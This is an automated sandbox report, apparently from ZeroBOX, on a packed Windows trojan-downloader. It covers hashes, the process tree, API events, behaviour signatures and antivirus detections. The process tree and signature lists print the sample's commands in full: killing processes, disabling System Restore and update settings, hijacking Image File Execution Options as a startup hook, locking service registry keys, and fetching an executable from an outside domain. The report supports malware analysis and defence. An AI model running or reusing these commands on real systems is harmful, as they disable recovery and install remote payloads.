Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 13, 2024, 2:05 p.m.	Nov. 13, 2024, 2:08 p.m.

Size	1.0MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed, RAR self-extracting archive
MD5	`3e47dd3f7b0be7bc26abea791d386145`
SHA256	`ce760056cd6800c9d0e05e6c84b6360ab626d86381b0d9ab0764d1b27736ed86`
CRC32	`0BE38E44`
ssdeep	`24576:bA6foqZxz4UMRM0dZj5YKGYRu8YnwVbE/x8Ub7pq2sBkbRBxh4yXom1rWZE3zj:UitZxzrsM+ZNYNRXuU420kPxhRXdaZEv`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file

ASUFER.exe "C:\Users\test22\AppData\Local\Temp\ASUFER.exe"
1976
- cmd.exe cmd /c ""C:\windows\ehome\SER.bat" "
  2112
  - taskkill.exe taskkill /f /im ipz.exe
    2184
  - taskkill.exe taskkill /f /im ipz2.exe
    2284
  - taskkill.exe taskkill /f /im nvidsrv.exe
    2372
  - taskkill.exe taskkill /f /im safesurf.exe /T
    2456
  - taskkill.exe taskkill /f /im surfguard.exe
    2520
  - reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "UseWUServer" /t REG_DWORD /d "0" /f
    2584
  - reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmisrv.exe" /f
    2628
  - reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmsdll.exe" /f
    2672
  - reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amsql.exe" /f
    2716
  - reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\slscv.exe" /f
    2760
  - reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fturl.exe" /f
    2808
  - reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdgmgr.exe" /f
    2852
  - reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ams.exe" /f
    2896
  - reg.exe reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
    2940
  - subin.exe subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xStarter /deny=SYSTEM=F
    2984
  - subin.exe subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProgramService /deny=SYSTEM=F
    3032
  - subin.exe subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddns /deny=SYSTEM=F
    1684
  - sc.exe sc stop xStarter
    2096
  - subin.exe subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Bios /deny=SYSTEM=F
    2188
  - wmild.exe wmild.exe -c http://openslowmo.com/img/icons/SURFSET.exe --no-check-certificate
    2340
  - reg.exe reg delete HKLM\SOFTWARE\JetSwap /f
    2820
  - reg.exe reg delete HKCU\SOFTWARE\JetSwap /f
    2892
  - net.exe net stop xStarter
    2952
    - net1.exe C:\Windows\system32\net1 stop xStarter
      3024
  - reg.exe Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
    2068
  - reg.exe Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waagent.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
    2236
  - reg.exe Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
    204
  - reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
    2484
  - reg.exe reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr" /v Start /t REG_DWORD /d "4" /f
    1668
  - taskkill.exe taskkill /f /im wuau≡½▓«exe /T
    2332
  - taskkill.exe taskkill /f /im wuapp.exe /T
    2812
  - taskkill.exe taskkill /f /im waagent.exe /T
    2980
  - taskkill.exe taskkill /f /im wups.exe /T
    2212
  - taskkill.exe taskkill /f /im wudriver.exe /T
    2352
  - taskkill.exe taskkill /f /im stub.exe
    2088
  - net.exe net stop xStarter
    2944
    - net1.exe C:\Windows\system32\net1 stop xStarter
      2052
  - sc.exe sc stop xStarter
    2092

Name	Response	Post-Analysis Lookup
openslowmo.com		87.118.86.57

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (11 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 13, 2024, 2:05 p.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (50 out of 267 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: taskkill console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /f /im ipz.exe console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: taskkill console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /f /im ipz2.exe console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: taskkill console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /f /im nvidsrv.exe console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: taskkill console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /f /im safesurf.exe /T console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: taskkill console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /f /im surfguard.exe console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: del console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: setu.bat console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: Could Not Find C:\windows\ehome\setu.bat console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: move console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /y subin.exe C:\Windows\system32\subin.exe console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: 1 file(s) moved. console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: move console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /y cmdo.vbs C:\Windows\system32\cmdo.vbs console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: The system cannot find the file specified. console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: del console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /F /Q C:\Windows\system32\updpars.exe console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: Could Not Find C:\Windows\system32\updpars.exe console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: del console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /F /Q C:\Windows\system32\updpars.exe console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: Could Not Find C:\Windows\system32\updpars.exe console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: del console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: /F /Q C:\Windows\updpars.exe console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: Could Not Find C:\Windows\updpars.exe console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "UseWUServer" /t REG_DWORD /d "0" /f console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmisrv.exe" /f console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmsdll.exe" /f console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: C:\windows\ehome> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 13, 2024, 2:05 p.m.	buffer: reg console_handle: 0x00000007	1	1

Creates executable files on the filesystem (16 events)

file	C:\Windows\ehome\subin.exe
file	C:\Windows\ehome\sDPS.bat
file	C:\Windows\ehome\SER.bat
file	C:\Windows\ehome\SETA.bat
file	C:\Windows\ehome\cmsdll.exe
file	C:\Windows\ehome\wmild.exe
file	C:\Windows\ehome\ar.ocx
file	C:\Windows\ehome\SETUPER.bat
file	C:\Windows\ehome\amsql.exe
file	C:\Windows\ehome\instsrv.exe
file	C:\Windows\ehome\sc.exe
file	C:\Windows\ehome\DPS.bat
file	C:\Windows\ehome\DNS.bat
file	C:\Windows\ehome\nobuf.vbs
file	C:\Windows\ehome\readcac.exe
file	C:\Windows\ehome\ser.reg

Drops a binary and executes it (3 events)

file	C:\Windows\ehome\SER.bat
file	C:\Windows\ehome\sc.exe
file	C:\Windows\ehome\wmild.exe

Executes one or more WMI queries (6 events)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ipz2.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nvidsrv.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "stub.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "surfguard.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ipz.exe")

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0000b400', u'virtual_address': u'0x0001b000', u'entropy': 7.890457316204004, u'name': u'UPX1', u'virtual_size': u'0x0000c000'}

entropy

7.8904573162

description

A section with a high entropy has been found

entropy

0.909090909091

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (35 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Nov. 13, 2024, 2:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

The executable is compressed using UPX (2 events)

section	UPX0				description	Section name indicates UPX
section	UPX1				description	Section name indicates UPX

Uses Windows utilities for basic Windows functionality (33 events)

cmdline	reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr" /v Start /t REG_DWORD /d "4" /f
cmdline	reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ams.exe" /f
cmdline	reg delete HKLM\SOFTWARE\JetSwap /f
cmdline	subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Bios /deny=SYSTEM=F
cmdline	taskkill /f /im ipz2.exe
cmdline	reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdgmgr.exe" /f
cmdline	taskkill /f /im waagent.exe /T
cmdline	taskkill /f /im wuau≡½▓«exe /T
cmdline	taskkill /f /im stub.exe
cmdline	Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
cmdline	reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fturl.exe" /f
cmdline	taskkill /f /im ipz.exe
cmdline	taskkill /f /im wuapp.exe /T
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "UseWUServer" /t REG_DWORD /d "0" /f
cmdline	sc stop xStarter
cmdline	net stop xStarter
cmdline	reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
cmdline	Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waagent.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
cmdline	taskkill /f /im wudriver.exe /T
cmdline	subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xStarter /deny=SYSTEM=F
cmdline	taskkill /f /im safesurf.exe /T
cmdline	subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProgramService /deny=SYSTEM=F
cmdline	reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amsql.exe" /f
cmdline	reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmsdll.exe" /f
cmdline	reg delete HKCU\SOFTWARE\JetSwap /f
cmdline	taskkill /f /im nvidsrv.exe
cmdline	reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\slscv.exe" /f
cmdline	Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
cmdline	subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddns /deny=SYSTEM=F
cmdline	reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmisrv.exe" /f
cmdline	reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
cmdline	taskkill /f /im surfguard.exe
cmdline	taskkill /f /im wups.exe /T

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe\debugger	reg_value	ctfmon.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waagent.exe\debugger	reg_value	ctfmon.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe\debugger	reg_value	ctfmon.exe

Attempts to disable System Restore (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR

Stops Windows services (1 event)

service

sr (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sr\Start)

File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Generic.lCIq
Cynet	Malicious (score: 99)
Skyhigh	GenericRXCJ-IK!CBE61C7395CC
ALYac	Trojan.Generic.36731320
Cylance	Unsafe
VIPRE	Trojan.Generic.36731320
CrowdStrike	win/malicious_confidence_60% (D)
BitDefender	Trojan.Generic.36731320
K7GW	Riskware ( 0015e4f01 )
K7AntiVirus	Riskware ( 0015e4f01 )
Arcabit	Trojan.Generic.D23079B8
Baidu	BAT.Trojan-Downloader.Agent.af
VirIT	Trojan.Win32.Agent.AYQF
Symantec	Infostealer.Gampass
Elastic	malicious (moderate confidence)
ESET-NOD32	multiple detections
Avast	BV:Agent-ALQ [Trj]
ClamAV	Win.Trojan.Genome-5527
Kaspersky	Trojan-Downloader.BAT.wGet.ac
Alibaba	TrojanDownloader:Win32/DelayedStart.b52a3a92
NANO-Antivirus	Trojan.Script.Systroj.dddlxb
MicroWorld-eScan	Trojan.Generic.36731320
Rising	Downloader.Upatre!8.B5 (CLOUD)
Emsisoft	Trojan.Generic.36731320 (B)
F-Secure	Trojan.TR/Spy.6144.213
DrWeb	Tool.Starter.10
TrendMicro	TSPY_FAREIT.YYSRV
McAfeeD	ti!CE760056CD68
Trapmine	suspicious.low.ml.score
CTX	exe.trojan.generic
Sophos	Mal/Generic-R
Ikarus	Trojan-Downloader.BAT.Agent
FireEye	Generic.mg.3e47dd3f7b0be7bc
Google	Detected
Avira	TR/Spy.6144.213
Antiy-AVL	HackTool/Win32.KeyGen
Kingsoft	malware.kb.b.815
Gridinsoft	Trojan.Win32.Agent.vb!s2
Xcitium	Packed.Win32.MUPX.Gen@24tbus
Microsoft	Tool:Win32/Multiverze
ZoneAlarm	Trojan-Downloader.BAT.wGet.ac
GData	Script.Trojan-Downloader.Agent.AJY
Varist	W32/Trojan.RFBI-8246
AhnLab-V3	Trojan/Win32.Tiggre.R299355
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.591484791
Panda	Trj/CI.A
Zoner	Probably Heur.ExeHeaderL
TrendMicro-HouseCall	TSPY_FAREIT.YYSRV

ASUFER.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All